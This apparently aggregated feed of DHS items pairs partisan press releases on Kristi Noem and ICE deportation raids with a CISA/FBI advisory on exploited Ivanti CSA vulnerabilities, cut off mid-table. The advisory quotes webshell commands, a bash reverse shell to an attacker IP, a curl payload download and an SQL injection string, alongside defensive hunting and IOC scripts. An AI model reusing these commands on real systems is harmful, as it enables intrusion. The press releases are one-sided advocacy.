PHOTO RELEASE: Secretary Kristi Noem Hits the Streets with ICE Agents

Source: US Department of Homeland Security

New York City – Today, Secretary Kristi Noem went on an Immigration and Customs Enforcement (ICE) removal operation in New York City. The target of this operation was violent criminals, including a ringleader of Tren De Aragua, in the United States. 

Secretary Noem addressed the law enforcement agents and officers taking part in the operation

On January 28, Secretary Noem rode with DHS law enforcement to arrest criminal aliens in New York City.  

Secretary Noem with law enforcement outside one of the targets of the removal operation.

ICE, DEA, the Secret Service, NYPD, ATF New York, and the U.S. Marshals participated in the immigration raids.


President Trump is Already Securing Our Border and Deporting Criminal Aliens

Source: US Department of Homeland Security

Immediately after being sworn in President Trump took executive action to stop the invasion at the southern border and to empower law enforcement agents to deport criminal aliens

“In a move fulfilling one of now-President Donald Trump’s campaign promises, the Trump administration shuttered the use of CBP One, a President Joe Biden-era app meant to help process migrants seeking to apply for asylum in the U.S.” USA Today: Trump kills Biden-era CBP One app for asylum-seekers at the border

“The Department of Homeland Security (DHS) on Monday issued memos to repeal limits on Immigration and Customs Enforcement (ICE) agents imposed by former DHS Secretary Alejandro Mayorkas…ICE agents who spoke to Fox News said they believe that rescinding the Mayorkas order is going to free them up to go after more illegal immigrants.” Fox News: Trump DHS repeals key Mayorkas memo limiting ICE agents, orders parole review

On January 22, ICE officers arrested Franz Cadet, a 43-year-old citizen of Haiti. Cadet was convicted of multiple drug offenses.


“Federal officers swept into sanctuary cities on President Trump’s first full day in office Tuesday, nabbing more than 300 illegal migrant criminals — including an attempted murderer and a child molester — to hold them for deportation.” The New York Post: ICE arrested 308 illegal migrants — including attempted murderer and a child molester — on Trump’s first full day in office

“The Trump administration is attempting to amass a larger force of law-enforcement officials to help carry out deportations by granting agents across the federal government the same powers as an immigration officer, according to an internal memo.” The Wall Street Journal: Trump Gives Gun, Drug Agents Deportation Power

“The number of Border Patrol encounters at the southern border in the first three days of the Trump administration is 35% lower than the final three days of the Biden administration, the sources said.” Fox News: Border encounters drop sharply as Trump launches crackdown on illegal immigration 

PHOTO RELEASE: Kristi Noem Sworn in as the Secretary of DHS

Source: US Department of Homeland Security

WASHINGTON – Yesterday, Kristi Noem was confirmed by the U.S. Senate in a vote of 59-34 and sworn in as the Secretary of the Department of Homeland Security by U.S. Supreme Court Justice Clarence Thomas.

“It is such an honor to be sworn in as the United States Secretary of Homeland Security. It was made even more meaningful by being sworn in by Supreme Court Justice Clarence Thomas at his home. Thank you, President Trump for putting your trust in me to help keep America safe.”  

— Secretary Kristi Noem  

On January 25, Kristi Noem is sworn in as the Secretary of the Department of Homeland Security

The swearing-in ceremony took place at the home of U.S. Supreme Court Justice Clarence Thomas.


US Senate Confirms Kristi Noem as Secretary of Homeland Security

Source: US Department of Homeland Security

WASHINGTON – Today, the United States Senate voted overwhelmingly to confirm Kristi Noem as the 8th Secretary of the Department of Homeland Security in a vote of 59-34.

A statement from Secretary Noem on her confirmation is below: 

“As the Secretary of the Department of Homeland Security, I will work every day to keep all Americans safe and secure. One of my top priorities is achieving President Trump’s mandate from the American people to secure our southern border and fix our broken immigration system. 

“The Trump Administration will once-again empower our brave men and women in law enforcement to do their jobs and remove criminal aliens and illegal gangs from our country. We will fully equip our intelligence and law enforcement to detect and prevent terror threats and will deliver rapid assistance and disaster relief to Americans in crisis. 

“I thank President Trump and the US Senate for their trust in me. Together, we will ensure that the United States, once again, is a beacon of freedom, safety, and security for generations to come.” 

Prior to her confirmation as Secretary of the Department of Homeland Security, Secretary Noem served as South Dakota's 33rd Governor and its first female governor. A rancher, farmer, and small business owner, Noem served in the South Dakota legislature for years and was later elected to serve as South Dakota's sole member of the U.S. House of Representatives.

Statement from a DHS Spokesperson on Directive Expanding Immigration Law Enforcement

Source: US Department of Homeland Security

WASHINGTON – Today, Acting Department of Homeland Security Secretary Benjamine Huffman issued a directive essential to fulfilling President Trump’s promise to carry out mass deportations.

The directive gives Department of Justice (DOJ) law enforcement officials in the U.S. Marshals, Drug Enforcement Administration (DEA), the Bureau of Alcohol, Tobacco, Firearms and Explosives, and the Federal Bureau of Prisons authority to investigate and apprehend illegal aliens.

“Thanks to the last Administration’s open border policies, we’ve seen violent criminals and gang members terrorize American communities. Today’s action empowers law enforcement officials at the DOJ to help identify and apprehend aliens who have illegally come into our country. Mobilizing these law enforcement officials will help fulfill President Trump’s promise to the American people to carry out mass deportations. For decades, efforts to find and apprehend illegal aliens have not been given proper resources. This is a major step in fixing that problem.”

Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications

Source: US Department of Homeland Security

Note: The CVEs in this advisory are unrelated to vulnerabilities (CVE-2025-0282 and CVE-2025-0283) in Ivanti's Connect Secure, Policy Secure and ZTA Gateways. For more information on mitigating CVE-2025-0282 and CVE-2025-0283, see Ivanti Releases Security Updates for Connect Secure, Policy Secure, and ZTA Gateways.

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory in response to exploitation in September 2024 of vulnerabilities in Ivanti Cloud Service Appliances (CSA): CVE-2024-8963, an administrative bypass vulnerability; CVE-2024-9379, a SQL injection vulnerability; and CVE-2024-8190 and CVE-2024-9380, remote code execution vulnerabilities.

According to CISA and trusted third-party incident response data, threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks. The actors’ primary exploit paths were two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380 and the other exploited CVE-2024-8963 and CVE-2024-9379. In one confirmed compromise, the actors moved laterally to two servers.

All four vulnerabilities affect Ivanti CSA 4.6.x versions before patch 519; two of them (CVE-2024-9379 and CVE-2024-9380) also affect CSA versions 5.0.1 and below. According to Ivanti, these CVEs have not been exploited in version 5.0.[1]

Ivanti CSA 4.6 is End-of-Life (EOL) and no longer receives patches or third-party libraries. CISA and FBI strongly encourage network administrators to upgrade to the latest supported version of Ivanti CSA. Network defenders are encouraged to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory. Credentials and sensitive data stored within the affected Ivanti appliances should be considered compromised. Organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory.


Technical Details

Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

In September 2024, Ivanti released two Security Advisories disclosing exploitation of CVE-2024-8190 and CVE-2024-8963.[2][3] In October 2024, Ivanti released another advisory disclosing exploitation of CVE-2024-9379 and CVE-2024-9380.[1]

  • CVE-2024-8963 [CWE-22: Path Traversal] is an administrative bypass vulnerability that allows threat actors to remotely access restricted features within the appliance. When used in conjunction with CVE-2024-8190 [CWE-78: OS Command Injection], threat actors can remotely authenticate into a victim's network and execute arbitrary commands on the appliance [T1219].[2][3]
  • CVE-2024-9379 [CWE-89: SQL Injection] allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.[1]
  • CVE-2024-9380 [CWE-77: Command Injection] allows a remote authenticated attacker with admin privileges to obtain RCE.[1]

According to Ivanti’s advisories and industry reporting, these vulnerabilities were exploited as zero days.[4] Based on evidence of active exploitation, CISA added CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 to its Known Exploited Vulnerabilities (KEV) Catalog.

According to CISA and trusted third-party incident response data, threat actors chained the above listed vulnerabilities to gain initial access, conduct RCE, obtain credentials, and implant webshells on victim networks. The primary exploit paths included two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380. The other chain exploited CVE-2024-8963 and CVE-2024-9379. After exploitation, the actors moved laterally in one victim—other victims had no follow-on activity because they identified anomalous activity and implemented mitigation measures.

Exploit Chain 1

The threat actors leveraged CVE-2024-8963 in conjunction with remote code execution vulnerabilities, CVE-2024-8190 and CVE-2024-9380. Acting as a nobody user [T1564.002], the threat actors first sent a GET request to datetime.php to acquire session and cross-site request forgery (CSRF) tokens using GET /client/index.php%3F.php/gsb/datetime[.]php [T1071.001]. They followed this in quick succession with a POST request to the same endpoint, using the TIMEZONE input field to manipulate the setSystemTimeZone function and execute code. In some confirmed compromises, the actors used this method to run base64-encoded Python scripts that harvested encrypted admin credentials from the database [T1552.001]. Note: The actors used multiple script variations. See Appendix A for examples of encoded and decoded scripts.

In some cases, the threat actors exfiltrated the encrypted admin credentials and then decrypted them offline [TA0010]. In other cases, the threat actors leveraged an executable in the /tmp directory whose name matched the regular expression php\w{6} to decrypt the credentials prior to exfiltration; this tool was unrecoverable.

After obtaining credentials, the actors logged in and exploited CVE-2024-9380 to execute commands from a higher-privileged account. The actors successfully sent a GET request to /gsb/reports[.]php. They immediately followed this with a POST request using the TW_ID input field to execute code to implant webshells for persistence [T1505.003].

In one confirmed compromise, the threat actors tried to create webshells using two different paths:

  • echo "<?php system($_REQUEST['a']);" > /opt/ivanti/csa/broker/webroot/client/help.php
  • echo "<?php system($_REQUEST['a']);" > /opt/landesk/broker/webroot/gsb/help.php

In the same compromise, the actors used the exploit to execute the following script to create a reverse Transmission Control Protocol command and control (C2) channel: bash -i >&/dev/tcp/107.173.89[.]16/8000 0>&1.

In another compromise, the threat actors maintained their presence on the victim’s system for a longer amount of time. The threat actors used sudo commands to disable the vulnerability in DateTimeTab.php, modify and remove webshells, and remove evidence of exploitation [T1548.003]. See Appendix B for the list of sudo commands used.
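The request pattern described for Exploit Chain 1 (an unauthenticated GET through the index.php%3f.php traversal to fetch tokens, followed within seconds by a POST to the same /gsb/ script) and the sudo attempts by the web server account are both visible in ordinary appliance logs. The following hunting script is an added example, not part of the advisory or Ivanti's tooling. It assumes Apache/NCSA combined-format access logs and the sudo message format in /var/log/secure; the log lines embedded in it are constructed from RFC 5737 addresses and are not victim data.

```python
"""Hunt for the Ivanti CSA request pattern and sudo denials described in the
advisory (added example; constructed sample data)."""
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Tuple

# The "%3f.php" segment after /client/index.php is the CVE-2024-8963 traversal
# that reaches the /gsb/ admin scripts without authentication.
TRAVERSAL = re.compile(r"/client/index\.php%3f\.php/gsb/", re.IGNORECASE)

# Scripts named in the advisory and the follow-on bug abused through each.
TARGET_SCRIPTS = {
    "datetime.php": "CVE-2024-8190 (TIMEZONE command injection)",
    "reports.php": "CVE-2024-9380 (TW_ID command injection)",
    "broker.php": "CVE-2024-9379 (LOCKOUTATTEMPTS SQL injection)",
}

# Apache/NCSA combined log format: ip ident user [ts] "METHOD path proto" status ...
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# sudo logs this when an unprivileged account invokes it. The CSA web server
# runs as nobody, so any such line from nobody is a hunting lead.
SUDO_DENIED_RE = re.compile(r"nobody : user NOT in sudoers.*COMMAND=(?P<cmd>.+)$")


@dataclass
class Hit:
    ip: str
    ts: datetime
    method: str
    script: str
    reason: str


def scan_access_log(lines) -> List[Hit]:
    """Return every request that used the traversal prefix, tagged with the
    vulnerability usually chained behind the script it reached."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m or not TRAVERSAL.search(m["path"]):
            continue
        script = m["path"].rsplit("/", 1)[-1].split("?", 1)[0].lower()
        reason = TARGET_SCRIPTS.get(script, "CVE-2024-8963 traversal to other /gsb/ script")
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        hits.append(Hit(m["ip"], ts, m["method"], script, reason))
    return hits


def get_then_post(hits: List[Hit], window_s: int = 60) -> List[Hit]:
    """The advisory's tell: a GET (token fetch) followed in quick succession by
    a POST to the same script from the same IP. Returns the POSTs."""
    last_get: Dict[Tuple[str, str], datetime] = {}
    flagged = []
    for h in hits:
        key = (h.ip, h.script)
        if h.method == "GET":
            last_get[key] = h.ts
        elif h.method == "POST" and key in last_get:
            if 0 <= (h.ts - last_get[key]).total_seconds() <= window_s:
                flagged.append(h)
    return flagged


def scan_secure_log(lines) -> List[str]:
    """Commands the web server account tried to run through sudo."""
    return [m["cmd"].strip() for m in map(SUDO_DENIED_RE.search, lines) if m]


# Constructed sample data (RFC 5737 addresses); not taken from any victim.
ACCESS_LOG = """\
203.0.113.7 - - [04/Sep/2024:11:02:10 +0000] "GET /client/index.php%3F.php/gsb/datetime.php HTTP/1.1" 200 512
203.0.113.7 - - [04/Sep/2024:11:02:11 +0000] "POST /client/index.php%3F.php/gsb/datetime.php HTTP/1.1" 200 214
198.51.100.4 - - [04/Sep/2024:11:05:00 +0000] "GET /client/index.php HTTP/1.1" 200 3011
203.0.113.7 - - [04/Sep/2024:11:09:42 +0000] "GET /client/index.php%3F.php/gsb/reports.php HTTP/1.1" 200 801
203.0.113.7 - - [04/Sep/2024:11:09:43 +0000] "POST /client/index.php%3F.php/gsb/reports.php HTTP/1.1" 200 77
"""
SECURE_LOG = """\
Sep  5 10:14:02 csa sudo: nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/mv /tmp/php.ini /etc/php.ini
Sep  5 10:14:05 csa sudo: nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/sbin/hwclock --localtime --systohc
Sep  5 10:20:00 csa sshd[2201]: Accepted publickey for admin from 198.51.100.4 port 51022 ssh2
"""

if __name__ == "__main__":
    hits = scan_access_log(ACCESS_LOG.splitlines())
    for h in get_then_post(hits):
        print(f"{h.ip} GET->POST {h.script}: {h.reason}")
    for cmd in scan_secure_log(SECURE_LOG.splitlines()):
        print("sudo attempt by nobody:", cmd)
```

Any hit from scan_access_log is worth triage on its own, because the traversal prefix has no legitimate use; get_then_post narrows the list to the sequence the actors actually used. The sudo check should fire even when the command was denied, since a denied attempt still shows that code was running as the web server account.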

Lateral Movement

In one case, there was evidence of lateral movement after the threat actors gained access and established a foothold through this exploit chain. It is suspected that the threat actors gained access into a Jenkins server running a vulnerable, outdated version [T1068]. Logs on the Jenkins machine showed that a command in the bash history contained credentials to the postgres server. The threat actors then attempted to log into the Virtual Private Network (VPN) server but were unsuccessful. Prior to moving laterally, the actors likely performed discovery on the CSA device using Obelisk and GoGo to scan for vulnerabilities [T1595.002].

Exploit Chain 2

In one confirmed compromise, the actors used a similar exploit chain, exploiting CVE-2024-8963 in conjunction with CVE-2024-9379, using GET /client/index.php%3f.php/gsb/broker.php for initial access.

After the threat actors gained initial access, they attempted to exploit CVE-2024-9379 to create a webshell for persistent access. They executed GET and POST requests in quick succession to /client/index.php%3F.php/gsb/broker.php. In the POST body, the threat actors entered the following string in the lockout attempts field: LOCKOUTATTEMPTS = 1 ;INSERT INTO user_info(username, accessed, attempts) VALUES ('''echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>/.k''', NOW(), 10). The first portion of the input (LOCKOUTATTEMPTS = 1) matched the format the application expected and was handled correctly. The second portion, a stacked SQL statement [T1190], was not; the application executed both, allowing the threat actors to insert a row into the user_info table.

After inserting valid bash code as a username in the user_info table, the threat actors attempted to log in as that user. The authoring agencies believe the threat actors knew this login would fail but were attempting to coerce the application into handling the bash code improperly. In this attempt, the application did not evaluate the validity of the login but instead ran echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>./k as if it were code. The threat actors repeated this process with further echo commands until they had built a valid webshell [T1059]. However, there were no observations that the threat actors were successful.
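The failure in Exploit Chain 2 is that the form field was spliced into SQL text and the database was allowed to run more than one statement. The model below is an added example, not Ivanti's code: the settings and user_info tables, the handler names and the use of sqlite3 are all hypothetical stand-ins. The payload is the advisory's string with NOW() replaced by the sqlite equivalent. The hardened handler allowlists the setting name, parses the value as the integer it must be and binds it, so the stacked INSERT never reaches the database.

```python
"""Stacked-statement SQL injection from the advisory, modelled against sqlite3,
beside a hardened handler (added example; hypothetical schema)."""
import sqlite3

# Payload shaped like the one in the advisory; NOW() -> datetime('now') for sqlite.
PAYLOAD = (
    "LOCKOUTATTEMPTS = 1 ;INSERT INTO user_info(username, accessed, attempts) "
    "VALUES ('''echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>/.k''', datetime('now'), 10)"
)

ALLOWED_SETTINGS = {"LOCKOUTATTEMPTS", "SESSIONTIMEOUT"}  # hypothetical columns


def fresh_db() -> sqlite3.Connection:
    """Hypothetical schema standing in for the appliance's settings/user tables."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE settings (LOCKOUTATTEMPTS INTEGER NOT NULL, SESSIONTIMEOUT INTEGER NOT NULL);"
        "INSERT INTO settings VALUES (5, 30);"
        "CREATE TABLE user_info (username TEXT, accessed TEXT, attempts INTEGER);"
    )
    return db


def update_setting_vulnerable(db: sqlite3.Connection, assignment: str) -> None:
    """The failure mode: the request field becomes statement text and the driver
    is allowed to execute several statements. The first fragment is a valid
    assignment, so the UPDATE succeeds; the INSERT rides along behind it."""
    db.executescript("UPDATE settings SET " + assignment + ";")


def update_setting_safe(db: sqlite3.Connection, assignment: str) -> None:
    """Allowlist the column, require an integer value, bind it as a parameter."""
    name, sep, value = assignment.partition("=")
    name = name.strip().upper()
    if not sep or name not in ALLOWED_SETTINGS:
        raise ValueError(f"unknown setting {name!r}")
    number = int(value.strip())  # "1 ;INSERT ..." is not an int -> ValueError
    # The column name is safe to interpolate only because it was allowlisted.
    db.execute(f"UPDATE settings SET {name} = ?", (number,))
    db.commit()


def lockout_attempts(db: sqlite3.Connection) -> int:
    return db.execute("SELECT LOCKOUTATTEMPTS FROM settings").fetchone()[0]


def injected_users(db: sqlite3.Connection) -> list:
    return [row[0] for row in db.execute("SELECT username FROM user_info")]


if __name__ == "__main__":
    db = fresh_db()
    update_setting_vulnerable(db, PAYLOAD)
    print("vulnerable: lockout =", lockout_attempts(db), "users =", injected_users(db))
    db = fresh_db()
    try:
        update_setting_safe(db, PAYLOAD)
    except ValueError as exc:
        print("hardened: rejected ->", exc)
    print("hardened: lockout =", lockout_attempts(db), "users =", injected_users(db))
```

The stored username is the shell-looking text the actors wanted on disk; the advisory's second stage, where a later login handed that value to a shell, is a separate bug and is not modelled here. Note that a parameterized value alone would not have been enough in this design, because the attacker controlled the whole assignment; the name must be checked against a fixed list before it is interpolated.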

Detection of Activity

According to incident response data from three victim organizations, the actors were unsuccessful with follow-on activity due to the organizations’ rapid detection of the malicious activity. To remediate exploitation, all three organizations replaced the virtual machines with clean and upgraded versions.

Victim Organization 1

The first organization detected malicious activity early in the exploitation. A system administrator detected the anomalous creation of user accounts. After investigation, the organization remediated the incident. While it is likely admin credentials were exfiltrated, there were no signs of lateral movement.

Victim Organization 2

This organization had an endpoint protection platform (EPP) installed that alerted when the threat actors executed a base64-encoded script to create webshells. There were no indications that webshells were successfully created or of lateral movement.

Victim Organization 3

This organization leveraged the IOC findings from the other two victim sites to quickly detect malicious activity. This threat activity included the download and deployment of Obelisk and GoGo Scanner, which generated a large number of logs. The organization used these logs to identify anomalous activity.

Indicators of Compromise

See Table 1 through Table 3 for IOCs related to the threat actors’ exploitation of CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 in Ivanti CSA.

Disclaimer: Some IP addresses in this cybersecurity advisory may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.

Table 1: IP Address Used for Credential Theft, September 2024
Requested Path | IP Address | Log Source
/client/index.php%3f.php/gsb/datetime.php | 142.171.217[.]195 | /var/log/messages
/client/index.php%3f.php/gsb/datetime.php | 154.64.226[.]166 | /var/log/messages-20240904.gz
/client/index.php%3f.php/gsb/datetime.php | 216.131.75[.]53 |
/client/index.php%3f.php/gsb/datetime.php | 23.236.66[.]97 | /var/log/messages-20240905.gz
/client/index.php%3f.php/gsb/datetime.php | 38.207.159[.]76 | /var/log/messages-20240906.gz
Table 2: Survey 2, Ivanti CSA Network IOC List, September 2024
Type | IOC
IPv4 | 149.154.167[.]41
IPv4 | 95.161.76[.]100
URL | hxxps://file.io/E50vtqmJP5aa
URL | hxxps://file.io/RBKuU8gicWt
URL | hxxps://file.io/frdZ9L18R7Nx
URL | hxxp://ip.sb
URL | hxxps://pan.xj.hk/d/6401646e701f5f47518ecef48a308a36/redis
IPv4 | 142.171.217[.]195
IPv4 | 108.174.199[.]200
IPv4 | 206.189.156[.]69
URL | 108.174.199[.]200/Xa27efd2.tmp
IPv4 | 142.171.217[.]195
Table 3: Additional IOCs Derived from Incident Response, September 2024
Type IOC Description
Ipv4 107.173.89[.]16  
Ipv4 38.207.159[.]76  
Ipv4 142.171.217[.]195  
Ipv4 154.64.226[.]166  
Ipv4 156.234.193[.]18  
Ipv4 216.131.75[.]53  
Ipv4 205.169.39[.]11  
Ipv4 23.236.66[.]97  
Ipv4 149.154.176[.]41  
Ipv4 95.161.76[.]100  
Ipv4 142.171.217[.]195  
Ipv4 108.174.199[.]200  
Ipv4 206.189.156[.]69  
Ipv4 142.171.217[.]195  
Ipv4 67.217.228[.]83  
Ipv4 203.160.72[.]174  
Ipv4 142.11.217[.]3  
Ipv4 104.168.133[.]228  
Ipv4 64.176.49[.]160  
Ipv4 45.141.215[.]17  
Ipv4 142.171.217[.]195  
Ipv4 98.101.25[.]30  
Ipv4 216.131.75[.]53  
Ipv4 134.195.90[.]71  
Ipv4 23.236.66[.]97  
Hash a50660fb31df96b3328640fdfbeea755  
Hash 53c5b7d124f13039eb62409e1ec2089d  
Hash 698a752ec1ca43237cb1dc791700afde  
Hash aa69300617faab4eb39b789ebfeb5abe  
Hash c2becc553b96ba27d60265d07ec3bd6c  
Hash cacc30e2a5b2683e19e45dc4f191cebc /opt/ivanti/csa/broker/webroot/client/help.php
Hash 061e5946c9595e560d64d5a8c65be49e /opt/landesk/broker/webroot/gsb/view.php
Hash e35cf026057a3729387b7ecfb213ae62a611f0f1a418876b11c9df3b56885bed /tmp/brokerdebug
Hash c7d20ca6fe596009afaeb725fec8635f /opt/landesk/broker/webroot/gsb/help.php
Hash F7F81AE880A17975F60E1E0FE1A4048B /opt/landesk/broker/webroot/gsb/DateTimeTab.php
Hash 86B62FFD33597FD635E01B95F08BB996 /opt/landesk/broker/webroot/gsb/style.php
Hash DD975310201079CACD4CDE6FACAB8C1D /opt/landesk/broker/webroot/client/index.php
Hash 1B20E9310CA815F9E2BD366FB94E147F /sbin/systemd (configuration file at /WpService.conf)
Hash 30f57e14596f1bcad7cc4284d1af4684 /sbin/systemd (configuration file at /WpService.conf)

URL hxxps://file.io/E50vtqmJP5aa  
URL hxxps://file.io/RBKuU8gicWt  
URL hxxps://file.io/frdZ9L18R7Nx  
URL hxxp://ip.sb  
URL hxxps://pan.xj.hk/d/6401646e701f5f47518ecef48a308a36/redis
URL 108.174.199.200/Xa27efd2.tmp  
URL 45.33.101.53/log  
URL 45.33.101.53/log2  
URL 208.184.237.75/fdsupdate  
URL 173.243.138.76/fdsupdate  
URL cri07nnrg958pkh6qhk0977u8c83jog6t.oast[.]fun  
URL cri07nnrg958pkh6qhk0yrgy1e76p1od6.oast[.]fun  
domain gg.oyr2ohrm.eyes[.]sh  
domain ggg.oyr2ohrm.eyes[.]sh  
domain gggg.oyr2ohrm.eyes[.]sh  
domain txt.xj[.]hk  
domain book.hacktricks[.]xyz  
host sh -c setsid /dev/shm/redis &  
host sh -c curl -k https://file[.]io/1zqvMYY1dpkk -o /dev/shm/redis2
host sh -c mv /dev/shm/redis2 /dev/shm/redis  
host sh -c rm /dev/shm/*  
host rm /dev/shm/PostgreSQL.1014868572 /dev/shm/redis  
host 78cc672218949a9ec87407ad3bcb5db6 Agent.zip
host d13f71e51b38ffef6b9dc8efbed27615 Log.log
host d88bfac2b43509abdc70308bef75e2a6 Log.exe
host R.exe (MD5: 60d5648d35bacf5c7aa713b2a0d267d3) R.exe
host ae51c891d2e895b5ca919d14edd42c26 CAService.exe
host d88bfac2b43509abdc70308bef75e2a6 Lgfxsys.exe
host f82847bccb621e6822a3947bc9ce9621 NetlO.cfg
host c894f55c8fa9d92e2dd2c78172cff745 XboVFyKw.tmp
host MD5: Unknown Wi.bat
host MD5: Unknown dCUgGXfm.tmp
host MD5: Unknown DijZViHC.tmp
CrowdStrike Falcon e09fef2f502a41c199046219a6584e8d CrowdStrike falcon cid
/var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/ln -sf  
/var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/mv /tmp/php.ini /etc/php.ini  
/var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/sbin/hwclock --localtime --systohc   
/var/secure log nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/subin/backuptool --fullList  
Ipv4 142.171.217[.]195  
Ipv4 107.173.89[.]16  
Ipv4 192.42.116[.]210  
Ipv4 82.197.182[.]161  
Ipv4 154.213.185[.]230  
Ipv4 216.131.75[.]53  
Ipv4 23.236.66[.]97  
Ipv4 208.105.190[.]170  
Ipv4 136.144.17[.]145  
Ipv4 136.144.17[.]133  
Ipv4 216.73.162[.]56  
Ipv4 104.28.240[.]123  
Ipv4 163.5.171[.]49  
Ipv4 89.187.178[.]179  
Ipv4 163.5.171[.]49  
Ipv4 203.160.86[.]69  
Ipv4 185.220.69[.]83  
Ipv4 185.199.103[.]196  
Ipv4 188.172.229[.]15  
Ipv4 155.138.215[.]144  
Ipv4 64.176.49[.]160  
Ipv4 185.40.4[.]38  
Ipv4 216.131.75[.]53
Ipv4 185.40.4[.]95  
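The indicators in Tables 1 through 3 are defanged (hxxp, [.]) and mixed in type: bare IPv4 addresses, URLs with and without a scheme, hostnames listed under URL, MD5 and one SHA-256 hash. The script below is an added example, not part of the advisory, that normalises those entries into sets a network sensor can match on and runs them over connection records. The indicator strings are copied from the tables above; the connection records and the record shape (src, dst, dst_port) are constructed for the example. As the disclaimer above says, a match is a lead to investigate, not proof of compromise.

```python
"""Refang and classify the advisory's IOCs, then match them against
connection records (added example; constructed connection data)."""
import ipaddress
import re
from urllib.parse import urlsplit


def refang(ioc: str) -> str:
    """Undo the defanging used in this advisory: hxxp(s):// and [.] / [:]."""
    s = ioc.strip()
    s = re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.IGNORECASE)
    return s.replace("[.]", ".").replace("[:]", ":")


def classify(ioc: str) -> str:
    """md5 | sha256 | url | ipv4 | domain | other, decided from the refanged form."""
    s = refang(ioc)
    if re.fullmatch(r"[0-9a-f]{32}", s, re.IGNORECASE):
        return "md5"
    if re.fullmatch(r"[0-9a-f]{64}", s, re.IGNORECASE):
        return "sha256"
    if "://" in s or "/" in s:  # scheme-less entries like 108.174.199.200/Xa27efd2.tmp
        return "url"
    try:
        ipaddress.ip_address(s)
        return "ipv4"
    except ValueError:
        pass
    if re.fullmatch(r"([a-z0-9-]+\.)+[a-z]{2,}", s, re.IGNORECASE):
        return "domain"
    return "other"


def build_watchlist(entries) -> dict:
    """Sort indicators into sets. URL entries contribute their host to the ipv4
    or domain set, so a bare connection to that host still matches."""
    watch = {"ipv4": set(), "domain": set(), "md5": set(), "sha256": set()}
    for raw in entries:
        kind, value = classify(raw), refang(raw)
        if kind == "url":
            url = value if "://" in value else "http://" + value
            host = urlsplit(url).hostname or ""
            kind, value = classify(host), host
        if kind in watch:
            watch[kind].add(value.lower())
    return watch


def match_connections(records, watch: dict) -> list:
    """records are (src, dst, dst_port) tuples; dst may be an IP or a hostname."""
    return [
        (src, dst, port)
        for src, dst, port in records
        if dst.lower() in watch["ipv4"] or dst.lower() in watch["domain"]
    ]


# Indicators copied from Tables 1-3 above, in their defanged form.
SAMPLE_IOCS = [
    "107.173.89[.]16",                                  # reverse shell C2, Exploit Chain 1
    "216.131[.]75.53",                                  # defanged inconsistently in Table 3
    "hxxps://file.io/E50vtqmJP5aa",
    "108.174.199[.]200/Xa27efd2.tmp",
    "cri07nnrg958pkh6qhk0977u8c83jog6t.oast[.]fun",     # listed as URL, really a hostname
    "a50660fb31df96b3328640fdfbeea755",
    "e35cf026057a3729387b7ecfb213ae62a611f0f1a418876b11c9df3b56885bed",
]

# Constructed connection records; not taken from any victim.
SAMPLE_CONNECTIONS = [
    ("10.0.0.5", "107.173.89.16", 8000),
    ("10.0.0.5", "file.io", 443),
    ("10.0.0.9", "198.51.100.20", 443),
]

if __name__ == "__main__":
    watch = build_watchlist(SAMPLE_IOCS)
    for src, dst, port in match_connections(SAMPLE_CONNECTIONS, watch):
        print(f"lead: {src} -> {dst}:{port}")
```

Hashes stay in their own sets for an endpoint or file-scan pass; file.io and the oast.fun / eyes.sh names are shared or attacker-registered infrastructure, so a hit on them says more than a hit on a single IP, which may be a VPS reassigned since September 2024.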

MITRE ATT&CK Tactics and Techniques

See Table 4 to Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 4: Reconnaissance
Technique Title ID Use
Active Scanning: Vulnerability Scanning T1595.002 Threat actors performed reconnaissance by using Obelisk and GoGo to scan for vulnerabilities.
Table 5: Initial Access
Technique Title ID Use
Exploit Public-Facing Application T1190 Threat actors leveraged weaknesses in applications that are not properly handled to compromise network device protocols, perform SQL injections, and generally exploit applications.
Table 6: Execution
Technique Title ID Use
